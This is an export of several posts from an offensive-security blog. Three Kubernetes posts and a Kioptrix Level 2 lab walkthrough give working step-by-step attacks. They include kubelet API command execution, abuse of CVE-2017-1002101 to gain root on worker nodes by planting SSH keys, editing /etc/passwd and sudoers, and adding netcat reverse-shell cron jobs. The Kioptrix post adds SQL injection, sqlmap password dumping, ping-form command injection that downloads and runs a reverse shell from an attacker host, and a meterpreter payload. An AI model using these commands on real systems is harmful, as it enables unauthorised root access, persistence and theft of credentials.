tag:blogger.com,1999:blog-30123950243370250632024-03-13T20:48:00.063-07:00POC HACKAngelohttp://www.blogger.com/profile/05892942548123519223noreply@blogger.comBlogger32125tag:blogger.com,1999:blog-3012395024337025063.post-33355822532811394782018-05-18T00:42:00.001-07:002018-05-18T00:42:50.042-07:00Hacking kubernetes part 3 - Five ways to get root access to the worker node method 2 using CVE-2017-1002101Hi all, today I am going to demonstrate five ways to get root access to a worker node not just from a hacked pod, but also from your local machine (As long as you can access the kubernetes api :) )<br />
<iframe width="720" height="350" src="https://www.youtube.com/embed/7R4QtLmo85w" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
<br />
Before you read the rest of this post, please read this sites to get familiar with the problem :<br />
https://thenewstack.io/kubernetes-races-to-fix-regressions-introduced-by-recent-security-patches/<br />
https://github.com/kubernetes/kubernetes/issues/60813<br />
<br />
I am going to demonstrate the bug CVE-2017-1002101, accessing the subpath inside a mounted volume.<br />
<br />
There is five ( or even more) ways to exploit this bug, the first one is if your worker node is on read only mode, that means you can't get ssh root access to the worker node depending on how locked down the node is, BUT you can read everything from it, and that also means you can access any mounted volume storage which also means that you have access to the docker socket and that means root level access :)<br />
<pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%">
<code>
/tmp/kubectl exec -ti pod2 -- sh -c "ssh-keygen -t rsa -b 4096 -f /tmp/hacker.key -q -N ''"
/tmp/kubectl exec -ti pod2 -- sh -c "cd /vol/root ; mkdir .ssh ; chmod 700 .ssh ; cd .ssh ; cat /tmp/hacker.key.pub >> authorized_keys ; chmod 600 authorized_keys"
worker_ip=$(/tmp/kubectl describe pod $pod2 | grep Node: | awk {'print $2'} | cut -f2 -d/)
/tmp/kubectl exec -ti pod2 -- sh -c "ssh -o StrictHostKeyChecking=no -i /tmp/hacker.key root@$worker_ip"
</code>
</pre>
<br />
The second way is when the worker node is on read write mode for the / partition, which is usually the case, that means, you can get root access to the worker node, I have seen some nodes with some of the partitions RO and some RW, so I managed to craft an exploit for all different situations and mount points that are writeable. On this second attack, I try to add a user on /etc editing /etc/passwd and also /etc/sudoers. I also set the home for this user on a RW partition like /tmp. Then I can copy my keys over and ssh into the host.<br />
<pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%">
<code>
/tmp/kubectl exec -ti pod2 -- sh -c "ssh-keygen -t rsa -b 4096 -f /tmp/hacker.key -q -N ''"
/tmp/kubectl exec -ti pod2 -- sh -c "echo -e 'hacker:$pass:2000:0:Hacker:/tmp/hacker:/bin/sh' >> /vol/etc/passwd"
/tmp/kubectl exec -ti pod2 -- sh -c "echo 'hacker ALL=(ALL) ALL' >> /vol/etc/sudoers"
/tmp/kubectl exec -ti pod2 -- sh -c "cd /vol/tmp ; mkdir hacker ; cd hacker ; mkdir .ssh ; chmod 700 .ssh ; cd .ssh ; cat /tmp/hacker.key.pub >> authorized_keys ; chmod 600 authorized_keys ; chown 2000:0 /vol/tmp/hacker -R"
worker_ip=$(/tmp/kubectl describe pod pod2 | grep Node: | awk {'print $2'} | cut -f2 -d/)
/tmp/kubectl exec -ti pod2 -- sh -c "ssh -o StrictHostKeyChecking=no -i /tmp/hacker.key hacker@$worker_ip"
</code>
</pre>
<br />
The third method is also if etc is RW, in case I can't ssh into the host for some security reason , I do the opposite, I ask the node to connect back to me with a reverse shell and the way I do this is by adding a cron under /etc/crontab<br />
<pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%">
<code>
pod_ip=$(/tmp/kubectl describe pod pod2 | grep -i IP | awk {'print $2'})
echo -e "Adding entry on crontab on /etc/crontab to do a reverse shell on..."
echo -e "Preparing your evil host to accept the connection..."
/tmp/kubectl exec -ti pod2 -- sh -c "echo '* * * * * root nc -c /bin/sh $pod_ip 6666' >> /vol/etc/crontab"
/tmp/kubectl exec -ti pod2 -- sh -c "nc -l -v -p 6666"
</code>
</pre>
<br />
The fourth method is if /etc is also RO and I can't add user or add cron, so I try to do the same, adding a cron for the root user ( since I can write under root perms) to /var/spool/cron/root, I add the cron into this file, so again, it's the same, just a reverse shell back to my pod.<br />
<pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%">
<code>
pod_ip=$(/tmp/kubectl describe pod pod2 | grep -i IP | awk {'print $2'})
echo -e "Adding entry on crontab on /var/spool/root to do a reverse shell on..."
echo -e "Preparing your evil host to accept the connection..."
/tmp/kubectl exec -ti pod2 -- sh -c "echo '* * * * * nc -c /bin/sh $pod_ip 6666' >> /vol/var/spool/cron/root"
/tmp/kubectl exec -ti pod2 -- sh -c "nc -l -v -p 6666"
</code>
</pre>
<br />
The fifth is using the docker socket that lives under /var/run/docker.sock , so I can thing like :<br />
<pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%">
<code>
/tmp/kubectl exec -ti pod2 -- sh -c "yum install -y -q docker-client"
docker -H unix:////vol/var/run/docker.sock run -i -v /:/tmp/host busybox ls -la /tmp/host/
</code>
</pre>
<br />
<br />
I have wrote an exploit to make my life easier to exploit all options which I will demonstrate on the video. On my exploit I also have a mode to poke around the file system.
PS : If you have noticed, I didn't give much information on how to exploit this, that is because this was only fixed on version 1.10.Angelohttp://www.blogger.com/profile/05892942548123519223noreply@blogger.com7tag:blogger.com,1999:blog-3012395024337025063.post-89225506412742611522018-04-08T13:40:00.000-07:002018-04-08T13:40:00.527-07:00Hacking kubernetes part 2 - Getting root access to the worker node method 1 (By misconfiguration)Hi everyone, in today's post I am going to explain how to ssh into the worker node where the pod is hosted. In order to do this, you need to be able to complete part 1 of this tutorial, if you have not seen yet, please do before watching this one.<br />
Now that you are inside the hacked pod with ssh connection, let's try to mount the root volume for the worker node where this pod is running. You should be able to this as it's enabled by default, if the sysadmin didn't changed it, you are good to go. You need this file and the permission to launch pods from inside the hacked pod, again, if that pod is using the default service account you should be able to do it.<br />
<iframe width="720" height="350" src="https://www.youtube.com/embed/KP1nF1frI6I" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
<br />
File : deployment.yaml<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
---
kind: PersistentVolumeClaim
apiVersion: v1
metadata:
name: task-pv-claim
spec:
storageClassName: manual
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
---
kind: PersistentVolume
apiVersion: v1
metadata:
name: task-pv-volume
labels:
type: local
spec:
storageClassName: manual
capacity:
storage: 1Gi
accessModes:
- ReadWriteOnce
hostPath:
path: "/root"
---
kind: Pod
apiVersion: v1
metadata:
name: sshworker
spec:
volumes:
- name: task-pv-storage
persistentVolumeClaim:
claimName: task-pv-claim
containers:
- name: task-pv-container
image: centos
name: sshworker
command: ["sleep"]
args: ["66666"]
volumeMounts:
- mountPath: "/mnt/worker_node"
name: task-pv-storage
</code></pre>
<br />
From inside the hacked pod, apply this config file<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@hacked-6565c4954f-fnnvj /]# kubectl apply -f deployment.yaml
</code>
</pre>
<br />
Now open a bash session on the pod that you just created from inside the hacked pod :<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@hacked-6565c4954f-fnnvj /]# kubectl exec -ti sshworker /bin/bash
</code>
</pre>
<br />
If everything went ok, you should be able to see the contents of the /root folder of the worker node.<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@sshworker /]# cd /mnt/worker_node/
[root@sshworker worker_node]# </code></pre>
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>[root@sshworker worker_node]# ls -la
total 8
drwxr-xr-x 3 root root 0 Apr 8 18:01 .
drwxr-xr-x 1 root root 4096 Apr 8 17:59 ..
-rw------- 1 root root 1737 Apr 8 17:56 .bash_history
drwx------ 2 root root 0 Apr 4 20:48 .ssh
-rw-r--r-- 1 root root 0 Apr 8 18:01 minikube_host</code></pre>
<br />
Now go back to the sshworker pod. You need to install a few packages to generate the ssh keys:<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@sshworker worker_node]# yum install -y -q openssh-clients.x86_64 openssh.x86_64
warning: /var/cache/yum/x86_64/7/base/packages/fipscheck-lib-1.4.1-6.el7.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID f4a80eb5: NOKEY
Public key for fipscheck-lib-1.4.1-6.el7.x86_64.rpm is not installed
Public key for openssh-7.4p1-13.el7_4.x86_64.rpm is not installed
Importing GPG key 0xF4A80EB5:
Userid : "CentOS-7 Key (CentOS 7 Official Signing Key) <security centos.org="">"
Fingerprint: 6341 ab27 53d7 8a78 a7c2 7bb1 24c6 a8a7 f4a8 0eb5
Package : centos-release-7-4.1708.el7.centos.x86_64 (@CentOS)
From : /etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
[root@sshworker worker_node]#
</security></code></pre>
<br />
Now let's generate a ssh key with :<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@sshworker /]# ssh-keygen -t rsa -b 4096 -f /tmp/hacker.key -q -N ''
[root@sshworker /]#
</code>
</pre>
<br />
Check if there is a .ssh folder on root, if there is you don't have to do the following steps, but if can't see, then you do:<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
ls -la .ssh ( is nothing, then...)
mkdir .ssh
chmod 700 .ssh
cd .ssh
</code>
</pre>
<br />
Now add you public key to the authorized_keys file:<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
cat /tmp/hacker.key.pub >> authorized_keys
chmod 600 authorized_keys
</code>
</pre>
<br />
Now get the ip address of the host where your pod is running with, run this from the hacked pod where you have installed kubectl command:<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@hacked-6565c4954f-fnnvj /]# kubectl describe pod sshworker | grep Node:
Node: k8sdemo/192.168.99.100
</code>
</pre>
<br />
And now try to ssh into the host:<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@sshworker .ssh]# ssh -i /tmp/hacker.key -o StrictHostKeyChecking=no root@192.168.99.100
_ _
_ _ ( ) ( )
___ ___ (_) ___ (_)| |/') _ _ | |_ __
/' _ ` _ `\| |/' _ `\| || , < ( ) ( )| '_`\ /'__`\
| ( ) ( ) || || ( ) || || |\`\ | (_) || |_) )( ___/
(_) (_) (_)(_)(_) (_)(_)(_) (_)`\___/'(_,__/'`\____)
# id
uid=0(root) gid=0(root) groups=0(root)
</code>
</pre>
<br />
<br />
And boom!!! You are on the worker node, now you can do this for all other worker nodes.Angelohttp://www.blogger.com/profile/05892942548123519223noreply@blogger.com1tag:blogger.com,1999:blog-3012395024337025063.post-17235205816510898542018-04-01T11:40:00.000-07:002018-04-06T16:08:27.953-07:00Hacking kubernetes part 1 - Kubelet exec and reverse shell from pod.Hello everyone, it's been a while since my last post, main reason is because there was nothing interesting to post until now :) I will be posting a series of posts on how to hack kubernetes since this is a hot topic at the moment.<br />
<br />
Kubelet api by default allows to be accessed with anonymous auth, no keys , no password, nothing is needed.<br />
<br />
<iframe width="720" height="350" src="https://www.youtube.com/embed/ivmn1Oay41g" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
<br />
This is what you are going to need to reproduce this :<br />
<br />
1) Running kubernetes <=1.9 , it has been fixed on version 1.10: <a href="https://github.com/kubernetes/kubernetes/pull/59666">https://github.com/kubernetes/kubernetes/pull/59666</a><br />
2) Kubelet api port must be exposed to the internet or to your local network, the port 10255 and 10250<br />
3) rbac rules misconfigured or not even present.<br />
4) A cluster to test, I recommend installing minikube.<br />
5) You need to find a container that is not read only to install stuff, but even if it's not read only, you can get a lot of info from it like secrets and aws iam information.<br />
<br />
<br />
So, let's do this, I did this on minikube just to play and prove the concept. That's the easiest way to play with this vulnerability. So go ahead and install minikube or you can run this on your cluster.<br />
Once you have your minikube installed , you need to the ip address, get it with<br />
<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo http://poc-hack.blogspot.co.uk/:~ minikube ip
</code>
</pre>
<br />
Mine is 192,.168.99.100, yours might be different. In order to do the curl's below, you are going to need the pod name and the id.<br />
So let's launch 2 pods, one with the vulnerable host and the other one that will be waiting our reverse shell.<br />
1) Launch the evil container that will be listening for our reverse shell.<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo http://poc-hack.blogspot.co.uk/:~ kubectl run evil --image=centos -it /bin/bash
</code>
</pre>
<br />
<br />
2) Lauch the hacked container that we will use to hack into.<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo http://poc-hack.blogspot.co.uk/:~ kubectl run hacked --image=centos -it /bin/bash
</code>
</pre>
<br />
<br />
The pod name is "hacked" and the pod id you can get with :<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo http://poc-hack.blogspot.co.uk/:~ kubectl get pods
NAME READY STATUS RESTARTS AGE
hacked-65d6998b6c-rgl28 1/1 Running 1 48m
evil-7d7fff7d4c-5lmfz 1/1 Running 1 1
</code>
</pre>
<br />
<br />
So in my case, the pod name is "hacked" and the pod id is "hacked-65d6998b6c-rgl28"<br />
If you are wondering how are you going to get this information from outside, this is how :<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo http://poc-hack.blogspot.co.uk/:~ curl --insecure \
https://kube-node-here:10250/pods | jq
</code>
</pre>
<br />
<br />
In my case, that command would translate to 192.168.99.100 because that's my minikube ip, in a real case scenario, that would be the ip of the master node and this is to get the pod names:<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo http://poc-hack.blogspot.co.uk/:~ curl -s --insecure \
https://192.168.99.100:10250/runningpods/ | jq .items[].spec.containers[].name
"mongodb"
"external-evil-host"
"hacked"
"sidecar"
"dnsmasq"
"kubedns"
"kubernetes-dashboard"
"storage-provisioner"
"kube-addon-manager"
</code>
</pre>
<br />
<br />
And this is how to get the pod ids :
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo http://poc-hack.blogspot.co.uk/:~ curl -s --insecure \
https://192.168.99.100:10250/runningpods/ | jq .items[].metadata.name
"mongodb-68cbf975f7-45kjh"
"external-evil-host-78d68f7789-2dmvw"
"hacked-6565c4954f-wdj4x"
"kube-dns-54cccfbdf8-dvtcm"
"kubernetes-dashboard-77d8b98585-mtpp9"
"storage-provisioner"
"kube-addon-manager-k8sdemo"
</code>
</pre>
From the command above you can get the pod id and name.<br />
Now let's get into the interesting part.<br />
Open 3 tabs on your terminal, one with a shell on the hacked container, one on the evil container and another one where you are going to run lots of curl commands.<br />
The first thing you are going to do is to create a file a test. Run this on your localhost.<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo http://poc-hack.blogspot.co.uk/:~ curl -sk \
https://192.168.99.100:10250/run/default/hacked-6565c4954f-wdj4x/hacked \
-d "cmd=touch /hello_world"
</code>
</pre>
<br />
<br />
Now check your hacked container shell, and check if the file hello_world was created :<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo http://poc-hack.blogspot.co.uk/:~ kubectl exec -ti hacked-65d6998b6c-rgl28 /bin/bash
[root@hacked-65d6998b6c-rgl28 /]#
[root@hacked-65d6998b6c-rgl28 /]# ls -la /hello_world
-rw-r--r-- 1 root root 0 Mar 22 16:22 /hello_world
</code>
</pre>
<br />
Alright, now that we know that all is well and working, let's install nc on that hacked box, so we can launch a reverse shell:<br />
1) Install nc in case it's not there yet.<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo http://poc-hack.blogspot.co.uk/:~ curl -sk \
https://192.168.99.100:10250/run/default/hacked-6565c4954f-wdj4x/hacked \
-d "cmd=yum install -y nc"
Loaded plugins: fastestmirror, ovl
Loading mirror speeds from cached hostfile
* base: mirror.freethought-internet.co.uk
* extras: mirrors.coreix.net
* updates: mirrors.coreix.net
Resolving Dependencies
--> Running transaction check
---> Package nmap-ncat.x86_64 2:6.40-7.el7 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
========================================================================
Package Arch Version Repository Size
========================================================================
Installing:
nmap-ncat x86_64 2:6.40-7.el7 base 201 k
Transaction Summary
========================================================================
Install 1 Package
Total download size: 201 k
Installed size: 414 k
Downloading packages:
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : 2:nmap-ncat-6.40-7.el7.x86_64 1/1
Verifying : 2:nmap-ncat-6.40-7.el7.x86_64 1/1
Installed:
nmap-ncat.x86_64 2:6.40-7.el7
Complete!
</code>
</pre>
2) Do the same for the evil container (execute this on your localhost):<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@evil-ccb5dd4fc-tqf9s /]# yum install -y nc net-tools
Loaded plugins: fastestmirror, ovl
base | 3.6 kB 00:00:00
extras | 3.4 kB 00:00:00
updates | 3.4 kB 00:00:00
(1/4): extras/7/x86_64/primary_db | 185 kB 00:00:00
(2/4): base/7/x86_64/group_gz | 156 kB 00:00:02
(3/4): updates/7/x86_64/primary_db | 6.9 MB 00:00:09
(4/4): base/7/x86_64/primary_db | 5.7 MB 00:00:26
Determining fastest mirrors
* base: mirror.econdc.com
* extras: mirrors.coreix.net
* updates: mirror.econdc.com
Resolving Dependencies
--> Running transaction check
---> Package nmap-ncat.x86_64 2:6.40-7.el7 will be installed
--> Processing Dependency: libpcap.so.1()(64bit) for package: 2:nmap-ncat-6.40-7.el7.x86_64
--> Running transaction check
---> Package libpcap.x86_64 14:1.5.3-9.el7 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
=================================================================================================================================================================
Package Arch Version Repository Size
=================================================================================================================================================================
Installing:
nmap-ncat x86_64 2:6.40-7.el7 base 201 k
Installing for dependencies:
libpcap x86_64 14:1.5.3-9.el7 base 138 k
Transaction Summary
=================================================================================================================================================================
Install 1 Package (+1 Dependent package)
Total download size: 338 k
Installed size: 731 k
Downloading packages:
warning: /var/cache/yum/x86_64/7/base/packages/nmap-ncat-6.40-7.el7.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID f4a80eb5: NOKEY
Public key for nmap-ncat-6.40-7.el7.x86_64.rpm is not installed
(1/2): nmap-ncat-6.40-7.el7.x86_64.rpm | 201 kB 00:00:00
(2/2): libpcap-1.5.3-9.el7.x86_64.rpm | 138 kB 00:00:04
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
Total 82 kB/s | 338 kB 00:00:04
Retrieving key from file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
Importing GPG key 0xF4A80EB5:
Userid : "CentOS-7 Key (CentOS 7 Official Signing Key) <security centos.org="">"
Fingerprint: 6341 ab27 53d7 8a78 a7c2 7bb1 24c6 a8a7 f4a8 0eb5
Package : centos-release-7-4.1708.el7.centos.x86_64 (@CentOS)
From : /etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : 14:libpcap-1.5.3-9.el7.x86_64 1/2
Installing : 2:nmap-ncat-6.40-7.el7.x86_64 2/2
Verifying : 2:nmap-ncat-6.40-7.el7.x86_64 1/2
Verifying : 14:libpcap-1.5.3-9.el7.x86_64 2/2
Installed:
nmap-ncat.x86_64 2:6.40-7.el7
Dependency Installed:
libpcap.x86_64 14:1.5.3-9.el7
Complete!
</security></code>
</pre>
<br />
<br />
3) Prepare the reverse shell connection on your evil host (execute this on your evil container, you need to get the ip address, so you can use on the other container to connect to this one:<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@evil-ccb5dd4fc-tqf9s /]# ifconfig | grep inet | head -n1
inet 172.17.0.4 netmask 255.255.0.0 broadcast 0.0.0.0
[root@external-evil-host-78d68f7789-2dmvw ~]# nc -l -p 6666
</code>
</pre>
<br />
<br />
4) Now let's try to run a reverse shell and get shell access to the container<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo http://poc-hack.blogspot.co.uk/:~ curl -sk \
https://192.168.99.100:10250/run/default/hacked-6565c4954f-wdj4x/hacked \
-d "cmd=nc -c /bin/sh 172.17.0.4 6666"
</code>
</pre>
<br />
<br />
<br />
6) Now go to the evil host and you should see the connecting from the hacked box:<br />
<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
root@external-evil-host-78d68f7789-2dmvw ~]# nc -l -p 6666
id
uid=0(root) gid=0(root) groups=0(root)
</code>
</pre>
<br />
<br />
And that's it, you are inside, game over.<br />
<br />
<br />Angelohttp://www.blogger.com/profile/05892942548123519223noreply@blogger.com3tag:blogger.com,1999:blog-3012395024337025063.post-88996605022588288242012-08-19T07:51:00.000-07:002012-08-19T07:51:55.260-07:00Kioptrix Level 2<center> <iframe width="560" height="315" src="http://www.youtube.com/embed/LPNrs7sqDB8" frameborder="0" allowfullscreen></iframe> </center>
<p><p>
Hi everyone, in this post I will explain how to get root on Kioptrix LEVEL 2.<br />
Lets start with the basics, nmap!<br />
<br />
<br />
Starting Nmap 6.01 ( <a href="http://nmap.org/">http://nmap.org</a> ) at 2012-08-13 10:30 BST<br />
Nmap scan report for 172.16.1.189<br />
Host is up (0.021s latency).<br />
Not shown: 994 closed ports<br />
PORT STATE SERVICE VERSION<br />
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)<br />
80/tcp open http Apache httpd 2.0.52 ((CentOS))<br />
111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)<br />
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))<br />
631/tcp open ipp CUPS 1.1<br />
3306/tcp open mysql MySQL (unauthorized)<br />
MAC Address: 00:50:56:AF:62:3F (VMware)<br />
Ok , so for this one ,lets try to access apache on that ip address Open your browser and and type the ip address of your kioptrix, in my case is <a href="http://172.16.1.189/">http://172.16.1.189</a> As you can see there is a login webpage , we don't know the user/password, but we can guess, OR try to do a sql injection, in my case, I am doing the sql injection, so on the username field, type : admin , and on the password field <br />
type : ' OR 1=1 -- - <br />
If you want to dig a bit more on the sql injection side of things, we can use sqlmap to fetch some information from the database. Here are some examples:<br />
1) Available databases :<br />
./sqlmap.py -u "<a href="http://172.16.1.189/">http://172.16.1.189</a>" --data "uname=admin&psw=xx' or OR 1=1 -- -" --dbs<br />
Result:<br />
available databases [2]:<br />
[*] `test\_%`<br />
[*] test<br />
2) Identify the current database<br />
./sqlmap.py -u "<a href="http://172.16.1.189/">http://172.16.1.189</a>" --data "uname=admin&psw=xx' or OR 1=1 -- -" --current-db<br />
Result :<br />
current database: 'webapp'<br />
3) Find all mysql users passwords<br />
./sqlmap.py -u "<a href="http://172.16.1.189/">http://172.16.1.189</a>" --data "uname=admin&psw=xx' or OR 1=1 -- -" --passwords<br />
Result :<br />
[*] john [1]:<br />
password hash: 5a6914ba69e02807<br />
[*] root [1]:<br />
password hash: 5a6914ba69e02807<br />
And so on. You can also have a sql shell on the server if you want.<br />
./sqlmap.py -u "<a href="http://172.16.1.189/">http://172.16.1.189</a>" --data "uname=admin&psw=xx' or OR 1=1 -- -" --sql-shell<br />
>select * from users; [2]:<br />
[*] 1, 5afac8d85f, admin<br />
[*] 2, 66lajGGbla, john<br />
<br />
Now, coming back to the browser you can see a new web page saying that you can ping a machine on the network, that means we can execute commands and if not properly configured, we can run more than just "ping". Lets try ping first, then we can try something else. If you typed your ip address on that box, you will be forwarded to <a href="http://172.16.1.189/pingit.php">http://172.16.1.189/pingit.php</a> That's the one we need to look now. So, instead just ping, lest try to add something else to the command like "; cat /etc/passwd" and see what happens.As you can see, we can read the /etc/passwd, that means we have a webshell to <br />
the server and now we can execute anything ( almost ;) ) , so lets upload our backdoor to the server.<br />
We can do this in many ways, I will me explaining the 2 methods:<br />
1) Upload a reverse shell ( the easyest way)<br />
172.16.1.1 ; wget -O /tmp/reverse_shell <br />
<a href="http://172.16.1.79/exploits/reverse_shell2">http://172.16.1.79/exploits/reverse_shell2</a><br />
2) Change permission to execute.<br />
172.16.1.1 ; chmod 777 /tmp/reverse_shell <br />
3) Prepare your BT server for the connection<br />
nc -l -p 10000<br />
4)And now run the reverse_shell<br />
172.16.1.1 ; /tmp/reverse_shell <br />
Done, now we have shell, we can try the same using backtrack.<br />
1) We need to start apache : /etc/init.d/apache2 start<br />
2) We need to create our backdoor: <br />
LHOST : IP of your backtrack<br />
LPORT : Port that backtrack will be listening to<br />
/var/www/backdoor.php.txt : That's where it will save your backdoor.<br />
So the complete command is :<br />
msfpayload php/meterpreter/reverse_tcp LHOST=172.16.1.79 LPORT=8080 R > <br />
/var/www/backdoor.php.txt<br />
<br />
Now, we need to start our session handler.<br />
<br />
msfconsole<br />
use multi/handler <br />
search php <br />
set PAYLOAD php/meterpreter/reverse_tcp <br />
set LHOST 0.0.0.0 <br />
set LPORT 8080 <br />
exploit -j -z <br />
Leave this one running and open open another shell on your backtrack.<br />
We need to edit our backdoor.php.txt ( script kid stuff)<br />
vi /var/www/backdoor.php.txt. Remove "#" from the first line and save it.<br />
<br />
Next step is to insert this in our ping command line .<br />
172.16.1.1 ; cd /tmp ; wget -O backdoor.php 172.16.1.79/backdoor.php.txt ; php <br />
-f backdoor.php <br />
If you look into that other shell, you should be reading this by now :<br />
[*] Sending stage (39217 bytes) to 172.16.1.189<br />
[*] Meterpreter session 4 opened (172.16.1.79:8080 -> 172.16.1.189:32807) at <br />
2012-08-13 14:12:00 +0100<br />
meterpreter ><br />
